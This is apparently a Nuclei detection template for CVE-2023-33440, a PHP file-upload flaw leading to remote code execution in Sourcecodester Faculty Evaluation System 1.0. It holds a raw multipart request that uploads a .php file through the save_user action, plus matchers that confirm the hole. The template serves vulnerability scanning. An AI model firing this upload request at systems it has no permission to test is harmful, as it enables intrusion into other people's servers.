id: CVE-2023-33440 info: name: Faculty Evaluation System v1.0 - Remote Code Execution author: Harsh severity: high description: | Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/172672/Faculty-Evaluation-System-1.0-Shell-Upload.html - https://github.com/F14me7wq/bug_report/blob/main/vendors/oretnom23/faculty-evaluation-system/RCE-1.md - https://nvd.nist.gov/vuln/detail/CVE-2023-333440 - https://github.com/1337kid/Exploits - https://github.com/Alexander-Gan/Exploits classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2023-33440 cwe-id: CWE-434 epss-score: 0.07644 epss-percentile: 0.94146 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: faculty_evaluation_system_project product: faculty_evaluation_system tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project variables: email: "{{randstr}}@{{rand_base(5)}}.com" string: "CVE-2023-33440" http: - raw: - | POST /ajax.php?action=save_user HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------1037163726497 -----------------------------1037163726497 Content-Disposition: form-data; name="id" 1 -----------------------------1037163726497 Content-Disposition: form-data; name="firstname" Administrator -----------------------------1037163726497 Content-Disposition: form-data; name="lastname" a -----------------------------1037163726497 Content-Disposition: form-data; name="img"; filename="{{randstr}}.php" Content-Type: application/octet-stream -----------------------------1037163726497 Content-Disposition: form-data; name="email" {{email}} -----------------------------1037163726497 Content-Disposition: form-data; name="password" -----------------------------1037163726497 Content-Disposition: form-data; name="cpass" -----------------------------1037163726497-- - | GET /login.php HTTP/1.1 Host: {{Hostname}} host-redirects: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - 'regex("^1$", body_1)' - '!regex("^2$", body_1)' - 'len(body_1) == 1' - 'contains(body_2, "Faculty Evaluation")' condition: and # digest: 490a0046304402201b5d53a634d522ffd0302ad7feec865783d2a241b8f3ccfd0b3d4a8d441a765202207e6111dade4a0684ae0224bab14df4d8e4ee5a17142d2c379d1615b52abc4032:922c64590222798bb761d5b6d8e72950